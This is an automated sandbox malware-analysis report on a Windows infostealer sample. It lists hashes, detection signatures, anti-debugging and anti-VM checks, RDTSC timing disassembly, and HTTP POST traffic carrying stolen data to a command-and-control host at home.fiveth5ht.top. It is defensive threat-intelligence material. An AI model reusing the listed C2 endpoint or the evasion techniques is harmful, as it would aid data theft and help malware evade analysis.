
Windows Analysis Report
f7qbEfJl0B.exe

Overview

General Information

Sample name:f7qbEfJl0B.exe
renamed because original name is a hash value
Original sample name:01fbecb34b5ac1c9c3336c64817f1637.exe
Analysis ID:1581409
MD5:01fbecb34b5ac1c9c3336c64817f1637
SHA1:51f08b5cfb4d7c7c0bb96b8c0c171e3cf05e27ab
SHA256:828c90e4bd13605fdf955b30e36336ff08d5f10858f21fdf38529debdd216013
Tags: exe, user-abuse_ch

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • f7qbEfJl0B.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\f7qbEfJl0B.exe" MD5: 01FBECB34B5AC1C9C3336C64817F1637)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: f7qbEfJl0B.exeAvira: detected
Source: f7qbEfJl0B.exeReversingLabs: Detection: 39%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: f7qbEfJl0B.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00FBDCF0
Source: f7qbEfJl0B.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: f7qbEfJl0B.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F9255D
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F929FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 442896
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 128Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F97770 recv,0_2_00F97770
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 442896
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2172952081.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: f7qbEfJl0B.exe, 00000000.00000002.2172952081.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ~
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: f7qbEfJl0B.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: f7qbEfJl0B.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: f7qbEfJl0B.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: f7qbEfJl0B.exeStatic PE information: section name:
Source: f7qbEfJl0B.exeStatic PE information: section name: .idata
Source: f7qbEfJl0B.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FD50A0 appears 31 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 010744A0 appears 72 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00F971E0 appears 42 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 0116CBC0 appears 81 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00F9CAA0 appears 40 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FACD40 appears 40 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FACCD0 appears 38 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FD4FD0 appears 183 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00F973F0 appears 86 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00F975A0 appears 530 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 01147220 appears 78 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FD4F40 appears 174 times
Source: f7qbEfJl0B.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: f7qbEfJl0B.exeStatic PE information: Section: lrpylste ZLIB complexity 0.9943323563117066
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F9255D
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F931D7 CreateToolhelp32Snapshot,CloseHandle,0_2_00F931D7
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: f7qbEfJl0B.exeReversingLabs: Detection: 39%
Source: f7qbEfJl0B.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: f7qbEfJl0B.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: kernel.appcore.dllJump to behavior
Source: f7qbEfJl0B.exeStatic file information: File size 4487168 > 1048576
Source: f7qbEfJl0B.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: f7qbEfJl0B.exeStatic PE information: Raw size of lrpylste is bigger than: 0x100000 < 0x1bb200

Data Obfuscation

Source: C:\Users\user\Desktop\f7qbEfJl0B.exeUnpacked PE file: 0.2.f7qbEfJl0B.exe.f90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lrpylste:EW;fpogxiqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lrpylste:EW;fpogxiqp:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: f7qbEfJl0B.exeStatic PE information: real checksum: 0x448a7f should be: 0x450c00
Source: f7qbEfJl0B.exeStatic PE information: section name:
Source: f7qbEfJl0B.exeStatic PE information: section name: .idata
Source: f7qbEfJl0B.exeStatic PE information: section name:
Source: f7qbEfJl0B.exeStatic PE information: section name: lrpylste
Source: f7qbEfJl0B.exeStatic PE information: section name: fpogxiqp
Source: f7qbEfJl0B.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FC3 push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00717FBB push cs; iretd 0_3_00717FCF
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077A056 pushfd ; retf 0001h0_3_0077A057
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00789250 push eax; retf 003Bh0_3_00789444
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_00778827 push ebp; retf 0_3_00778828
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_0077C314 push 700076A4h; ret 0_3_0077C319
Source: f7qbEfJl0B.exeStatic PE information: section name: lrpylste entropy: 7.95488352075432

Boot Survival

Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeWindow searched: window name: FilemonclassJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183243B second address: 183243F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183243F second address: 18324C2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F7B216C3176h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F7B216C3178h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov bx, si 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F7B216C3178h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F7B216C3178h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000015h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 jmp 00007F7B216C317Ch 0x00000069 push eax 0x0000006a push edi 0x0000006b push ecx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18344E8 second address: 18344FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18344FA second address: 1834500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182E5B8 second address: 182E5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182E5BC second address: 182E5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182F720 second address: 182F726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182F726 second address: 182F72B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182F72B second address: 182F7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 jnl 00007F7B212E85C9h 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007F7B212E85C8h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 mov eax, dword ptr [ebp+129C0B45h] 0x0000003f push 00000000h 0x00000041 push ecx 0x00000042 call 00007F7B212E85C8h 0x00000047 pop ecx 0x00000048 mov dword ptr [esp+04h], ecx 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc ecx 0x00000055 push ecx 0x00000056 ret 0x00000057 pop ecx 0x00000058 ret 0x00000059 push FFFFFFFFh 0x0000005b jl 00007F7B212E85CBh 0x00000061 push eax 0x00000062 movzx edi, dx 0x00000065 pop edi 0x00000066 nop 0x00000067 push esi 0x00000068 push eax 0x00000069 push edx 0x0000006a jno 00007F7B212E85C6h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182F7AC second address: 182F7B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18375D1 second address: 183765D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F7B212E85C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov dword ptr [ebp+129C2937h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007F7B212E85C8h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+129C3AF3h] 0x0000004b or edi, dword ptr [ebp+129C39F7h] 0x00000051 push 00000000h 0x00000053 jmp 00007F7B212E85CFh 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F7B212E85D9h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183765D second address: 183766E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1839C82 second address: 1839C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F7B212E85CCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1839C98 second address: 1839CAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B216C317Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1839CAC second address: 1839CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 movzx edi, ax 0x0000000b push 00000000h 0x0000000d mov ebx, dword ptr [ebp+12B45787h] 0x00000013 mov dword ptr [ebp+129C1835h], ebx 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+129C3B23h] 0x00000021 mov edi, edx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jo 00007F7B212E85CCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1839CDA second address: 1839CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18317CA second address: 18317D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183CCAF second address: 183CCB9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7B216C3176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1832625 second address: 1832629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1833603 second address: 1833609 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18345DD second address: 18345E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18345E1 second address: 18345E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1833609 second address: 183364F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B212E85CCh 0x00000008 jg 00007F7B212E85C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 movsx edi, dx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b sub dword ptr [ebp+12B543EAh], edi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov eax, dword ptr [ebp+129C1441h] 0x0000002e push ecx 0x0000002f push edi 0x00000030 mov dword ptr [ebp+129C24D7h], eax 0x00000036 pop ebx 0x00000037 pop edi 0x00000038 push FFFFFFFFh 0x0000003a mov ebx, dword ptr [ebp+129C2855h] 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18345E7 second address: 18345ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183DDCF second address: 183DDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
